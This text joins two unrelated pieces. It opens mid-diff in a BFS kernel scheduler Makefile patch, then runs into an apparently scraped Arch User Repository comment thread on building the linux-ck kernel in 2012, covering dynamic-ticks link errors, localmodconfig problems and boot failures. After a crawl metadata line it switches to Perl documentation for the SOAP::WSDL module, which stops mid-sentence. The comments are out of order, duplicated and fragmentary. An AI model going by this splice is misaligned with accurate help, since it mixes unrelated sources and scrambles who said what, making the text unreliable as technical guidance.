17:39:43.000000000 +1100 +++ linux-3.4-ck3/kernel/sched/Makefile 2012-07-03 14:00:08.131680971 +1000 @@ -11,10 +11,14 @@ ifneq ($(CONFIG_SCHED_OMIT_FRAME_POINTER CFLAGS_core.o := $(PROFILING) -fno-omit-frame-pointer endif +ifdef CONFIG_SCHED_BFS +obj-y += bfs.o clock.o +else obj-y += core.o clock.o idle_task.o fair.o rt.o stop_task.o -obj-$(CONFIG_SMP) += cpupri.o obj-$(CONFIG_SCHED_AUTOGROUP) += auto_group.o -obj-$(CONFIG_SCHEDSTATS) += stats.o obj-$(CONFIG_SCHED_DEBUG) += debug.o +endif +obj-$(CONFIG_SMP) += cpupri.o +obj-$(CONFIG_SCHEDSTATS) += stats.o Index: linux-3.4-ck3/mm/vmscan.c core.o will not be compiled when BFS is used, but calc_load_enter_idle is implemented in core.c. bfs.c does not contain calc_load_enter_idle. This may be the problem. Is there any ideas to solve this problem? @Eithrial This has already been covered. Disable dynamic ticks, aka: # CONFIG_NO_HZ. See comments from 22 Jul. @Graysky Well I'm busy this week, but my plan was to try again later in the week, double and triple check through and try 3.5 again, failing that I was going to pull arch 3.5 from git, have a look through and build it. I have a feeling because I also used localmodconf I may have missed something. Also, using systemd 186-2 had no booting issues for me. graysky commented on 2012-07-25 11:24 @eithrial - Comment by: graysky on Sun, 22 Jul 2012 12:22:02 +0000: Anonymous comment on 2012-07-25 11:02 I can't compile 3.4.6-1. I got [1m[31m==> ERROR:(B[m[1m A failure occurred in build().(B[m [1m Aborting...(B[m felixonmars commented on 2012-07-25 06:42 I'm using systemd 187-2 and have no trouble at all on 3.5.0-0. SirWuffleton commented on 2012-07-25 06:19 @graysky: Just enabled [testing] and -Syyu'd. After a reboot, both linux 3.5-1 and systemd 187-2 worked fine with no issues whatsoever. A full build of linux-ck 3.5-0 without localmodconfig is also working fine on my setup now that I've removed the btrfs_advanced hook.: Yikes, thanks for that information. I definitely won't be looking forward to that moving into core if those issues aren't resolved by then. It looks like the nonfunctional usb keyboard was due to a missing module (I used localmodconfig on my first build of it), and the early-userspace error was somehow the fault of btrfs_advanced, since specifying my root partition on the kernel's command line and disabling that hook resolved that problem. For now, systemd 186 seems to be working fine, seeing as I was able to successfully boot after the init issue was taken care of. misc commented on 2012-07-24 19:30 Haven't been able to boot with systemd since 187 regardless of the used kernel. It will just stop to boot after apparently mounting my partitions once more (it repeats the same massage mentioning my HDD as often as there are Linux-relevant partitions — all ext4 — on it), without any further explanation. All that's possible then is to try to reboot, upon which readahead will complain about a read-only partition and some fsck are run, then it halts again. IOW, right now I'm back to classic initscripts. SirWuffleton commented on 2012-07-24 18:53 I was unable to boot 3.5.0-0, it claimed that /sbin/init did not exist, and kicked me to a recovery shell, and my USB keyboard did not work (but my laptop's built one did). Not sure if it could contribute to this, but I'm using systemd and have a btrfs root (via the btrfs_advanced hook). misc commented on 2012-07-24 13:48 My USB mouse works, but now I have to enable a "Generic HID driver" in addition to the "Special HID" Logitech one. It's a laptop, so no idea how that affects USB keyboards. BTW I couldn't successfully boot at the first time, now it's ok again. Anonymous comment on 2012-07-23 23:40 Hi Graysky, I gave it a test myself - Does my USB mouse work? No idea because I couldn't get in to X because my USB keyboard didn't function at all, lol. Do you have USB keyboard? I'm sure I didn't overlook anything when configuring, never experienced this before. Back to 3.4.5 and another fresh config and all is well. graysky commented on 2012-07-23 21:59 @misc - Works fine on my machine expect that my usb mouse does not work. If you build, please report back. Does your usb mouse work? Remember that this -0 release has no BFS nor does it have a BFQ patchset. It is just the 3.5 kernel in the linux-ck formatted PKGBUILD. graysky, do you provide preliminary 3.5-0 build scripts? Because I'd very much prefer to run a "ck-less" 3.5 linux-ck for a few days which still was nonetheless compiled by myself (esp. with makenconfig & localmodcfg) than the default Arch kernel or 3.4.6-ck, and such -0 should only differ by a few lines from -1 anyway. hermes14 commented on 2012-07-23 06:16 Ok, I'm going to disable dynamic ticks for now, and wait for 3.5-ck to be released. Thanks graysky commented on 2012-07-22 20:12 @hermes14- you cannot enable dynamic ticks with 3.4.6 due to an incompatibility in bfs v0.424 and linux v3.4.6. CK will very likely have this fixed in the bfs version that will patch against 3.5 which is just been mainlined today. Did you modify this option in your nconfig? Test by: $ grep src/linux-3.4/.config # CONFIG_NO_HZ is not set hermes14 commented on 2012-07-22 19:04 I get this error: LD vmlinux.o MODPOST vmlinux.o GEN .version CHK include/generated/compile.h UPD include/generated/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 kernel/built-in.o: In function `tick_nohz_stop_sched_tick.isra.9': tick-sched.c:(.text+0x49c49): undefined reference to `calc_load_enter_idle' kernel/built-in.o: In function `tick_nohz_idle_exit': (.text+0x49fc7): undefined reference to `calc_load_exit_idle' make: *** [.tmp_vmlinux1] Errore 1 Any idea? How about adding [[ -e ...dvb/stuff ]] && cp .. to the DVB header section? I don't use DVB, so disable all of it in the config. I have to edit the PKGBUILD to skip the copy of these otherwise the build will fail, because the files are not to be found. Keep up the good work!? EDIT: I cannot build the ARCH package via ABS (from [testing]) either; ir errors out in the same exact spot INSTALL /scratch/linux/pkg/linux/lib/firmware/yamaha/ds1e_ctrl.fw DEPMOD 3.4.4-3-ARCH ERROR: could not open directory /scratch/linux/pkg/linux/lib/modules/3.4.4-3-ARCH: No such file or directory FATAL: could not search modules: No such file or directory ==> ERROR: A failure occurred in package_linux(). ... Is this because I am NOT using [testing]? graysky commented on 2012-07-04 09:10? Is this because I am NOT using [testing]? failed to build on my laptop (for months it was working fine except today) errors are: arch/x86/include/generated/asm/syscalls_32.h:327:1: error: expected ‘]’ before ‘:’ token make[1]: *** [arch/x86/kernel/asm-offsets.s] Error 1 make: *** [prepare0] Error 2 ==> ERROR: A failure occurred in build(). Aborting... look like there is a typo in the header file. Any idea? It looks like you ran into similar issues about two years ago! I'm not sure if the script has changed at all, but it looks like it's behaving as intended for the most part. The logic could be improved, but not without breaking some user's configs. I don't think it says it's supposed to mark all current modules to be compiled in, so that would still have to be done manually., I'm a little confused by some of the options in the PKGBUILD. If I use _localmodcfg="y" , it loads all of the modules I'd ever need from modprobed_db (love that tool, by the way. Thanks for writing it!) But when combined with _makenconfig="y", I notice that things that ought to be compiled in are marked as modules, and certain areas that wouldn't need anything enabled (modprobed_db has figured out all of the sound modules I need-- no need for any others) still have everything enabled. Are these options incompatible, or am I just misunderstanding the point of localmodcfg? Does it just make sure to mark all of the modules I need, and nothing else? Until the proper update and for those interested, here's the diff from the current tarball to build "3.4.3-0", incorporating the only change from testing's linux: Just "patch -i [what you saved it as]" in the folder of the extracted tarball. patch might give a harmless warning since pastebin ate the trailing empty line. misc commented on 2012-06-18 19:45 Until the proper update and for those interested, here's the diff from the current tarball to build "3.4.3-0", incorporating the only read change from testing's linux: Just "patch -i [what you saved it as]" in the folder of the extracted tarball. patch might give a harmless warning since pastebin ate the trailing empty line. alucryd commented on 2012-06-18 16:21 @graysky: It seems inverting the two names will also invert the order in which the package functions are processed. However, the headers function depends on variables created in the linux-ck function, so for this to work, you need to copy the few lines that define those variables from header to linux-ck functions, this is the modified PKGBUILD I used:. It should be possible to remove the lines from the linux-ck function rather than having them in both, but I haven't tested.: Since I'm installing the official kernel from the repo (just to have a functional kernel in case I screw up), I'm not having this problem, linux-headers is in my SyncFirst array and will install before linux, allowing the hooks to build their modules properly. I did some tests today, switching the two package functions will not have the desired effect. BUT turns out changing "true && pkgname=(linux-ck linux-ck-headers)" to "true && pkgname=(linux-ck-headers linux-ck)" will, plus it doesn't involve modifying the order the packages are built. Could you make this small change?:36 21:29 Bump to v3.2.4 Your package linux-ck has been flagged out of date by Guardiano [1]. Guys, please post some text indicating to me why this is out of date? 1) 3.4.2 is current per lkml 2) I see no modifications from the Arch debs beyond what is already in 3.4.2-1 some options seem to be missing in .config when using localmodcfg ==> If you have modprobe_db installed, running it in recall mode now Attempting to modprobe entire database... Done! ==> Running Steven Rostedt's make localmodconfig now using config: '.config' [...] Yama support (SECURITY_YAMA) [N/y/?] n Integrity Measurement Architecture(IMA) (IMA) [N/y/?] n EVM support (EVM) [N/y/?] (NEW) aborted! Console input/output is redirected. Run 'make oldconfig' to update configuration. ==> Running make bzImage and modules scripts/kconfig/conf --silentoldconfig Kconfig [...] Yama support (SECURITY_YAMA) [N/y/?] n Integrity Measurement Architecture(IMA) (IMA) [N/y/?] n EVM support (EVM) [N/y/?] (NEW) aborted! Console input/output is redirected. Run 'make oldconfig' to update configuration. make[2]: *** [silentoldconfig] Error 1 make[1]: *** [silentoldconfig] Error 2 make: *** No rule to make target `include/config/auto.conf', needed by `include/config/kernel.release'. Stop. make: *** Waiting for unfinished jobs.... make[1]: Nothing to be done for `all'. make[1]: Nothing to be done for `relocs'. ==> ERROR: A failure occurred in build(). Aborting... which processor family should i chose for apollo lake (goldmont) processor Celeron N3450?
https://aur.archlinux.org/pkgbase/linux-ck/?comments=all
CC-MAIN-2018-09
refinedweb
39,235
66.94
A forum about Atari 16/32 computers and their clones. This forum is in no way affiliated with Atari Interactive. Moderators: Mug UK, Zorro 2, Moderator Team tschak909 wrote:with the DTR hang-up I was trying to implement a simple sleep, but there isn't an equivalent call in plain TOS. Code: Select all #include <unistd.h> usleep(100000); /* in microsecs */ I'll need to understand how to do it for the other interface devices. Code: Select all *((volatile unsigned char *)0xffff8c85) = 5; /* select register 5 */ *((volatile unsigned char *)0xffff8c85) = 0xea; /* enable DTR */ Code: Select all *((volatile unsigned char *)0xffff8c85) = 5; /* select register 5 */ *((volatile unsigned char *)0xffff8c85) = 0x6a; /* drop DTR */ but it doesn't seem to make a dent in Aranym tschak909 wrote:It's hanging because RTS/CTS is enabled, and it's waiting for CTS to be ready to send the echo packet. tschak909 wrote:According to: Code: Select all flags &= ~(TF_STOPBITS|TF_CHARBITS|T_EVENP|T_ODDP|TANDEM|RTSCTS); flags |= TF_8BIT | TF_1STOP | RTSCTS; it works everywhere except Falcon. changing the serial port doesn't seem to make a dent. no serial I/O...wtf? Users browsing this forum: No registered users and 3 guests
http://www.atari-forum.com/viewtopic.php?p=377131
CC-MAIN-2020-10
refinedweb
196
62.17
jGuru Forums Posted By: Motor_Qian Posted On: Monday, April 9, 2001 12:12 AM I've been wondering for a while, for I've never seen anything about Java multi-process. Is there some way to implement Java multi-process like "fork()" on UNIX. Because JVM is a platform independent machine, so we could not control processes, that's operating-system featrues. I need process control over JVM. Thank you very much. Re: Is there some way to implement multi-tasking in Java (like "fork()" on UNIX)? Posted By: Finlay_McWalter Posted On: Tuesday, June 12, 2001 03:57 PM If you can possibly help it, try to avoid the need for this functionality in the first place, by using a Java application framework like JES (Java Embedded Server). This limits a few ofthe things you might like to do (mostly security and classloader stuff) but allows multiple programs to coexist in the same JVM. This has the additional benefit that it's much more efficient than a true fork - you still have only one JVM instance and only one OS process, which is much lighter weight than creating multiple processes each running a JVM. Posted By: Luigi_Viggiano Posted On: Sunday, May 6, 2001 05:30 PM public class SimpleThread extends Thread { int number; public void run() { for (int i = 1; i < 5; i++) { System.out.println("Hello from thread number " + number); try { sleep(number* 500); } catch (InterruptedException ie) {} } } public SimpleThread(int threadNumber) { number = threadNumber; start(); } public static void main(String[] args) throws Exception { new SimpleThread(1); new SimpleThread(2); new SimpleThread(3); }}
http://www.jguru.com/forums/view.jsp?EID=398528
CC-MAIN-2013-20
refinedweb
262
57.61
Important: Please read the Qt Code of Conduct - QT 64 bit on Windows env? mingw 64bit support? bad_alloc on 32 bit... Hi, I'm having an issue with the heap allocation under windows 32 bit architecture. I'm parsing a "big" xml (90 MB) with QDomDocument::setContent(QIODevice *dev, bool namespaceProcessing, QString *errorMsg = Q_NULLPTR, int *errorLine = Q_NULLPTR, int *errorColumn = Q_NULLPTR) and it seems to need around 2GB of memory which is refused by windows 32Bit and brake with a bad_allocation error message. On my Linux 64bit, I'm arriving to 1890920 KB just for the load of the XML and 3050420KB once my objects are loaded. So for what I read there is no way to cope with such amount of memory needed for a process under windows 32bit. I'm running QT 5.5.1 because I'm using webkit which is removed on 5.6 I've seen on the archive page this version: qt-opensource-windows-x86-msvc2013_64-5.5.1.exe What is it exactly? x86 but with ms compiler on 64bit, I'm confused... is that a full 64bit realease or the QT dlls are still in 32bit? If I understood correctly, mingw has also a 64bit support. Is there a way to compile with it in 64bit? Thanks in advance for your answers :) @mbruel May be you should not use QDomDocument, the documentation says: Note: The DOM tree might end up reserving a lot of memory if the XML document is big. For such documents, the QXmlStreamReader or the QXmlQuery classes might be better solutions. An application consuming 2GB of RAM to parse a XML file is not really what I as user would expect. @jsulm well yeah I know that it was not the best idea to use DOM but the project was started like this 5 years ago and they didn't imagine arriving to such big inputs. There was a "reason" to use DOM : it makes it much easier the process to translate the XML into the complex data structure. I'm just getting the project to finish it and rewrite all the parsing would take quite some time and so some money for the client which I don't think is a priority. We just load the DOM and destruct it once the internal structure is loaded so it is not a major issue to have to use 2GB and then release them (It seems that maybe not everything ends up released but that's another issue...). I've no problem running it under a linux 64bit environment with 8GB of RAM. The client is using Windows 64Bit with 8 to 16GB of RAM. I'm pretty convinced that if I could deliver them a version in 64 bit, they wouldn't have this allocation issue. @mbruel qt-opensource-windows-x86-msvc2013_64-5.5.1.exe should be the x64 version. I usually use the online installer - there you can select what ever you need. @jsulm ok thanks, I'm going to try to install it and see... I'm just confused by the naming of the exe... And would prefer to stick with mingw_64 but it doesn't look like we have this option... I'm using the offline installer cause I'm behind a proxy, but I'm having issue as I can't connect to the QT account... hum. I'll check compiling from the sources... I've just installed qt-opensource-windows-x86-msvc2013_64-5.5.1.exe and it seems QT dlls are in 32 bits, not 64... qmake adds by default the option: -spec win32-msvc2013 I don't really understand the purpose of this release if the dlls are in 32bits... @jsulm well I don't know much windows but if I open QT5CORE.DLL with dependancy walker, I see that it uses c:\windows\system32\Kernel32.dll, user32.dll, shell32.dll ... The dlls in c:\windows\system32 are not in 32bits? Cause there is another folder: c:\windows\SysWow64\ where I can find of those dlls... how can I know if a dll or an exe is compiled in 32bits or in 64bits? (like would the command file on linux) Let me know if I'm wrong but a program compiled in 64 bits can't load 32 bits dll right? @mbruel Something that hasn't been mentioned. 32-bit Windows has a stone ceiling of 3GB. Now subtract out 1/4 to 1/2 GB for windows and however large your app is. This is a huge problem in CAD applications and point cloud applications as well. I have seen about "building Qt" as 64 bit. You can install Qt (currently 5.6.x) and QtCreator (currently 4.0.3) from MSYS2 at sourceforge. This will give you both the 32-bit and 64-bit kits for static and dynamic builds. The current GNU toolchain is 6.1.0 so you will default to c++14 as a compiler. So, get as modern as you'd like! I have posted instructions (as close as I could remember) in other posts about MinGW32 builds wanting to go 64bit. You can find MSYS2 project on sourceforge. It is also mentioned in the 64bit WIKI on qt.io. I chose this route because I want to focus on the development and not building Qt. @mbruel This link is described as "Qt 5.7.0 for Windows 64-bit (VS 2013, 904 MB)" (see). So, qt-opensource-windows-x86-msvc2013_64-5.5.1.exe should be 64bit. Again, this 32 in system32.dll does not mean it is 32bits, it is coming from win32 API name. @jsulm well I'm confused about how Windows deals with its 64bits and 32bits dlls... $ file /cygdrive/c/Qt/Qt5.5.1_64msvc/5.5/msvc2013_64/bin/Qt5Core.dll /cygdrive/c/Qt/Qt5.5.1_64msvc/5.5/msvc2013_64/bin/Qt5Core.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows $ file /cygdrive/c/windows/system32/KERNEL32.DLL /cygdrive/c/windows/system32/KERNEL32.DLL: PE32+ executable (DLL) (console) x86-64, for MS Windows $ file /cygdrive/c/windows/sysWoW64/kernel32.dll /cygdrive/c/windows/sysWoW64/kernel32.dll: PE32 executable (DLL) (console) Intel 80386, for MS Windows So the 64bits versions are in system32 and the 32bit in sysWow64 ? strange naming... I've installed qt-opensource-windows-x86-msvc2013_64-5.5.1.exe and wanted to my project and compile it to give it a go but it seems that msvc2013_64 doesn't come with it and I'm kind of struggling to find it... It seems there was no 64bit version of msvc2013... @Buckwheat Same here I'd prefer to focus on code, but I'm having this 32bit Windows limitation on heap/stack size... I don't see on msys2 how to get QT directly... I need a specific version of QT (5.5.1) for compatibility reasons... I think I'll just try to compile it from the source if I don't manage to make the msvc run on 64bits... I believe the best solution is to fix the source of the problem. You should consider re-writing the XML parser. Qt has options to deal with this. We just load the DOM and destruct it once the internal structure is loaded so it is not a major issue to have to use 2GB and then release them (It seems that maybe not everything ends up released but that's another issue...). Based on this comment you are only using it to read or write the XML data. I know that QDomDocument is convenient but since it has a narrow purpose it can be re-written without huge changes to the overall program. Switching to a 64 bit version won't reduce the memory footprint of the application. If anything it will use more than the 32 bit version (the plus is that you have more available). This is not really a good solution to this problem. @mbruel Look for my other posts on MSYS2. I go through a complete (well mostly) walkthrough using pacman (the MSYS2 package manager) to download. The nice thing is that you do not have to worry about the /cygdrive/... stuff that is not portable. You also get the GDB debugger and do not have to go through the trouble of downloading and installing CDB for windows. I admit, the naming conventions on windows does not make sense. There is a lot of legacy and as stated just means "not windows 3.x" which was 16 bit. As a quickie: pacman -Ss qt shows all the qt libraries pacman -Ss toolchain shows the compiler toolchains. to install, pacman -Su ... pacman works similar to YUM and DNF. This is explained better in my other posts about MinGW - Chris Kawa Moderators last edited by Chris Kawa well I'm confused about how Windows deals with its 64bits and 32bits dlls... Just to clear up some naming confusion: x86doesn't really mean 32bit. There are various flavors of x86 architecture, including x86_64, which is the 64bit architecture. Unfortunately although not technically correct it has become common to call 32bit builds x86and 64bit builds x86_64or amd64. qt-opensource-windows-x86-msvc2013_64-5.5.1.exemeans 64bit Qt build for Visual Studio 2013. qt-opensource-windows-x86-msvc2013-5.5.1.exemeans 32bit Qt build for Visual Studio 2013. Learning the lessons of switching from 16bit to 32bit Microsoft decided not to change library names when switching to 64bit to allow easier porting of applications (you don't have to link to libs named differently for 32 and 64 bit). That made a mess on its own, to which another pile of confusion is the 32bit emulation layer in 64bit Windows called WOW64 (which stands for "Windows On Windows 64bit"). Combining these two facts you have: On 32bit Windows: C:/Windows/System32/kernel32.dll- this is a 32bit dll On 64bit Windows: C:/Windows/System32/kernel32.dll- this is a 64bit dll (yes, exactly the same as above) C:/Windows/SysWOW64/kernel32.dll- this is a 32bit dll and no, there is no kernel64.dllanywhere. As for VS2013 64bit there is no such thing. The IDE itself is 32 bit but it comes with a compiler for both 32 and 64 bit. When you install VS Qt Creator automatically picks up both versions (and some others, like ARM). When you compile Qt from command line you can select the 32 or 64 bit toolchain by running a vcvarsall.batbatch file from the VS directory with a parameter x86for 32bit or amd64for 64bit. @Rondog Well it would take a few days of work to change the parsing of the xml to use SAX instead of DOM. I agree it would be a good thing to do but it is not a priority for my client. Nowadays, most laptops or computers have minimum 8GB of ram, so using 3GB at launch shouldn't be a problem. Anyway, even without the parsing I could end up to need more than 2GB of RAM so the move to a 64bit version is definitely needed. @Buckwheat I may give it a try, but I've installed on my VM QT 64bit for msvc2013 and visual studio community 2013 and I've managed to compile my app in 64bit. I don't have anymore the bad allocation error and I'm able to use more than 3GB of RAM :) That's good enough for me. Plus in fact I guess that using msvc compiler instead of mingw could just be better for windows target (like my client is) as the system calls will be more direct (no need to include mingwm10.dll, libstdc++-6.dll, libgcc_s_dw-1.dll, libwinpthread-1.dll) @Chris-Kawa Yes now it is more clear in my mind... I found the naming really confusing when you don't know windows environment... this system32 being 64bits and Wow64 being 32 bit adaptation... On linux 64bit, the 64bits libs are in /usr/lib and the 32bit adaptation layer in /usr/lib32... This make more sense! Concerning Visual Studio 2013, I've found this article on stack overflow that explain well the difference between x86_64 and amd64 compiler. Visual Studio 2013 may be in 32bit but it has a 64 bit compiler and a 32bit one that can also generate a 64bit output.
https://forum.qt.io/topic/69667/qt-64-bit-on-windows-env-mingw-64bit-support-bad_alloc-on-32-bit
CC-MAIN-2021-31
refinedweb
2,059
73.37
The Fun of Creating Apache Airflow as a Service The Fun of Creating Apache Airflow as a Service Learn how to make Airflow an as-a-service tool to easily eliminate top enterprise pain points. We faced challenges building this system, but this post is about the fun. Join the DZone community and get the full member experience.Join For Free A while back, we shared a post about Qubole choosing Airflow as its workflow manager. Then, last year, there was a post about GAing Airflow as a service. In this post, I'll talk about the challenges — or, rather, the fun we had! — creating Airflow as a service in Qubole. After creating QuboleOperator, which connects Airflow and Qubole, we felt that customers (especially enterprise customers) would want much more. Some of the common pain points for these enterprise customers were: - Figuring out Airflow's configuration - Setting up required services like Celery, Rabbitmq, and Flower - Ensuring the installation is secure and accessible to its users - Devising a way to authenticate and authorize users - Setting up monitoring and alerting - Setting up crons to backup services logs to S3 - Auto-syncing dags from S3 or GitHub - Setting up AWS keys in Airflow so it can upload task logs to S3 We anticipated those pain points and came up with the solution of bundling tools and features in such a way that the intricacies of Airflow are hidden. This bundling makes Airflow a truly as-a-service tool, eliminating the top enterprise pain points with the click of a button. While we did face challenges while building this system, this post is about the fun. 1. Hosting Airflow Behind an NGINX Proxy This is the first step any enterprise user would want to do. The typical user wants a simple URL that can be bookmarked and will remain the same even if the machine gets rebooted. In cloud environments, this link would later lead to a new IP address unless you are using Elastic IPs. In Qubole the URL would be something like this (where 19289 is the ID of the cluster): To have all pages accessible via a common prefix, we've made changes in the code itself. Unlike with Celery Flower, there was no option to specify a prefix URL. There were two types of URLs being used in the Airflow codebase: - Flask's url_for method - Hardcoded and relative URLs We've found a nice way to add a prefix to each URL by overriding the url_for method. It saved us a lot of time and kept the code clean. For the hardcoded and relative URLs, we have to go through each page and convert them to the url_for method. @app.context_processor def override_url_for(): return dict(url_for=proxified_url_for) def proxified_url_for(endpoint, **values): return "/{0}{1}".format(airflow_webserver_proxy_uri, url_for(endpoint, **values)) Here, airflow_webserver_proxy_uri would be something like this: We also made a couple of changes to the way the Flask Admin app gets configured and how views get added to it. However, there remained a single link that could not be fixed, and that was the main "DAGs" link. So we did a hack and added following Javascript code to the master.html file. //hacky way of replacing broken link with correct linkdag_link = $("ul.navbar-nav:first > li:first a")[0]; dag_link.href = "{{ url_for('admin.index') }}"; The end result was beautiful. We have no broken pages, and Airflow UI can be accessed via the NGINX proxy only after a successful authentication and authorization via the Qubole tier. 2. Moving Assets to CDN Soon after we GAed Airflow as a service, we got feedback about the Airflow UI becoming slow in an unusable way. The cause was clear: Airflow's index page does roughly 20-22 calls to fetch HTML, JS, CSS, and images. All these calls go through the following stack if the cluster is in VPC: Browser > Qubole web node > Tunnel > Bastion Node > Airflow cluster As you can see, each call has to go through three extra hoops, so the index page — which loads in roughly ten seconds on my local laptop — was taking anywhere between 30-60 seconds to load for users. I tried to do HTTP caching on static assets but couldn't figure out a way to do that in Flask. Then, we chose a better way: putting assets onto CDN. Once again, the overide_url_for method came to our rescue. We filtered out and redirected asset calls to CDN. This small enhancement cut down the total page load time to only three to four seconds; much faster than running Airflow on my MacBook. Awesome! def proxified_url_for(endpoint, **values):in values: .format(cdn_url, url_for(endpoint, **values)) return .format(airflow_webserver_proxy_uri, url_for(endpoint, **values)) 3. Adding the Goto QDS Button Most customers found this feature super helpful, as it saves them a lot of time. To make this work, we had to make some changes to Airflow's UI code base to pass on the task's operator class. We also added a new route in the Flask App to support these calls. This makes use of Airflow's XCom feature to fetch Qubole command IDs and redirect them to the actual command running on the Qubole platform. As it is a Qubole-only feature, it has not been merged into open source. Also, this feature's associated button becomes visible only for QuboleOperator type tasks. 4. Authentication and Authorization Through Qubole All authentication and authorization on Airflow now happen via the Qubole control panel. As of now, there are only two types of authorization that happen after successful authentication. Cluster admin > The person who has update access on the cluster and can access all pages. Cluster user > The admin panel gets hidden and will not be accessible to users who do not have update access on the cluster. 5. Interoperability Between Airflow and Qubole Thanks to Airflow's on_failure and on_retry hooks we were able to make sure that if an Airflow worker reports a failure we hit the Qubole command API and verify its status. If the command status is successful, then we mark that Task instance as a success, and as "failed" if it failed. If the command is still running, we kill the command in Qubole and mark the TI as failed. The above feature could be useful in the event a worker dies (although that hasn't happened yet) or a whole node goes down. In such cases, Airflow's scheduler will assume these tasks to be Zombies and tries to mark them as failed. Using the above callbacks we were able to keep a constant sync between Qubole and Airflow. Scheduler's Zombie detection, callback hooks, and the four lines of code below are making this sync happen. if cmd.status == 'done': logger.info('Command ID: %s has been succeeded, hence marking this TI as Success.', cmd_id) ti.state = State.SUCCESSelif cmd.status == : logger.info('Cancelling the Qubole Command Id: %s ', cmd_id) cmd.cancel() 6. Auto-Uploading Task and Service Logs to S3 Airflow automatically uploads task logs to S3 after the task run has been finished. However, it relies on the user having setup proper access/secret keys, and so on. As we already have these keys present on the Airflow cluster, we replaced the open-source code with our own and made sure that task logs got uploaded properly. We made a similar change when logs were being fetched from S3. This process is even more effective if users are using IAM roles. By default, we also set a cron to periodically upload service logs (webserver, scheduler, workers, rabbitmq) to S3. 7. Using Monit to Manage Services and Monitoring We were able to use Monit successfully for monitoring and restarting services. We also used it to send us alert messages in the event a service could not be started at all. It also gave us some simple commands to manage Airflow services, like Monit start/stop/restart webserver/scheduler/worker 8. Qubole Goodies As with any other big data engine, a Qubole-Airflow integration automatically entitles users to Qubole goodies. These include: - Single click cluster start and stop - Support for IAM roles - Ability to log in via username-password, GAuth, or via a dozen different SAML providers - Ability to launch clusters in VPC - Customize the environment via node bootstraps In Summary I'd like to give a big thanks to the Airbnb team, core committers, and my colleague Yogesh, and to Airbnb for open sourcing such beautiful software. Even a person like me who had never coded in Python before was able to contribute to the project and customize it. Core committers: Max, Bolke, Siddharth, and Chris for reviewing a bunch of open source PR and helping in the integration of Qubole with Airflow. Yogesh for being involved since the evaluation of Airflow as the preferred choice to doing the GA as a managed service. Published at DZone with permission of Sumit Maheshwari , DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/the-fun-of-creating-apache-airflow-as-a-service?fromrel=true
CC-MAIN-2020-29
refinedweb
1,517
60.35
- NAME - SYNOPSIS - DESCRIPTION - USAGE - How it works - Caching - Methods - Notes - LIMITATIONS - CAVEATS - BUGS - TODO - CHANGES - AUTHOR NAME SOAP::WSDL SYNOPSIS use SOAP::WSDL; my $soap=SOAP::WSDL->new( wsdl => '' ) ->proxy( ''); $soap->wsdlinit; my $som=$soap->call( 'method' => [ { name => value }, { name => 'value' } ]); DESCRIPTION SOAP::WSDL provides decent WSDL support for SOAP::Lite. It is built as a add-on to SOAP::Lite, and will sit on top of it, forwarding all the actual request-response to SOAP::Lite - somewhat like a pre-processor. WSDL support means that you don't have to deal with those bitchy namespaces some web services set on each and every method call parameter. It also means an end to that nasty SOAP::Data->name( 'Name' )->value( SOAP::Data->name( 'Sub-Name')->value( 'Subvalue' ) ); encoding of complex data. (Another solution for this problem is just iterating recursively over your data. But that doesn't work if you need more information [e.g. namespaces etc] than just your data to encode your parameters). And it means that you can use ordinary hashes for your parameters - the encording order will be derived from the WSDL and not from your (unordered) data, thus the problem of unordered perl-hashes and WSDL >sequence< definitions is solved, too. (Another solution for the ordering problem is tying your hash to a class that provides ordered hashes - Tie::IxHash is one of them). Why should I use this ? SOAP::WSDL eases life for webservice developers who have to communicate with lots of different web services using a reasonable big number of method calls. If you just want to call a hand full of methods of one web service, take SOAP::Lite's stubmaker and modify the stuff by hand if it doesn't work right from the start. The overhead SOAP::WSDL imposes on your calls is not worth the time saving. If you need to access many web services offering zillions of methods to you, this module should be your choice. It automatically encodes your perl data structures correctly, based on the service's WSDL description, handling even those complex types SOAP::Lite can't cope with. SOAP::WSDL also eliminates most perl <-> .NET interoperability problems by qualifying method and parameters as they are specified in the WSDL definition. USAGE my $soap=SOAP::WSDL->new( wsdl => '' ); # or my $soap=SOAP::WSDL->new() $soap->wsdl(''); # or # without dispatching calls to the WebService # # useful for testing my $soap=SOAP::WSDL->new( wsdl => '', no_dispatch => 1 ); # you must call proxy before you call wsdlinit $soap->proxy( '') # optional (only necessary if the service you use is not the first one # in document order in the WSDL file). # If used, it must be called before wsdlinit. $soap->servicename('Service1'); # optional, set to a false value if you don't want your # soap message elements to be typed $soap->autotype(0); # never forget to call this ! $soap->wsdlinit; # with caching enabled: $soap->wsdlinit( caching => 1); my $som=$soap->call( 'method' , name => 'value' , name => 'value' ); How it works SOAP::WSDL takes the wsdl file specified and looks up the port for the service. On calling a SOAP method, it looks up the message encoding and wraps all the stuff around your data accordingly. Most pre-processing is done in wsdlinit, the rest is done in call, which overrides the same method from SOAP::Lite. wsdlinit SOAP::WSDL loads the wsdl file specified by the wsdl parameter / call using SOAP::Lite's schema method. It sets up a XPath object of that wsdl file, and subsequently queries it for namespaces, service, and port elements. The port you are using is deduced from the URL you're going to connect to. SOAP::WSDL uses the first service (in document order) specified in the wsdl file. If you want to chose a different one, you can specify the service by calling $soap->servicename('ServiceToUse'); If you want to specify a service name, do it before calling wsdlinit - it has no effect afterwards. call The call method examines the wsdl file to find out how to encode the SOAP message for your method. Lookups are done in real-time using XPath, so this incorporates a small delay to your calls (see "Memory consumption and performance" below. The SOAP message will include the types for each element, unless you have set autotype to a false value by calling $soap->autotype(0); After wrapping your call into what is appropriate, SOAP::WSDL uses the call() method from SOAP::Lite to dispatch your call. call takes the method name as first argument, and the parameters passed to that method as following arguments. Example: $som=$soap->call( "SomeMethod" => "test" => "testvalue" ); $som=$soap->call( "SomeMethod" => %args ); Caching SOAP::WSDL uses a two-stage caching mechanism to achieve best performance. First, there's a pretty simple caching mechanisms for storing XPath query results. They are just stored in a hash with the XPath path as key (until recently, only results of "find" or "findnodes" are cached). I did not use the obvious Cache or Cache::Cache module here, because these use Storable to store complex objects and thus incorporate a performance loss heavier than using no cache at all. Second, the XPath object and the XPath results cache are be stored on disk using the Cache::FileCache implementation. A filesystem cache is only used if you 1) enable caching 2) set wsdl_cache_directory The cache directory must be, of course, read- and writeable. XPath result caching doubles performance, but increases memory consumption - if you lack of memory, you should not enable caching (disabled by 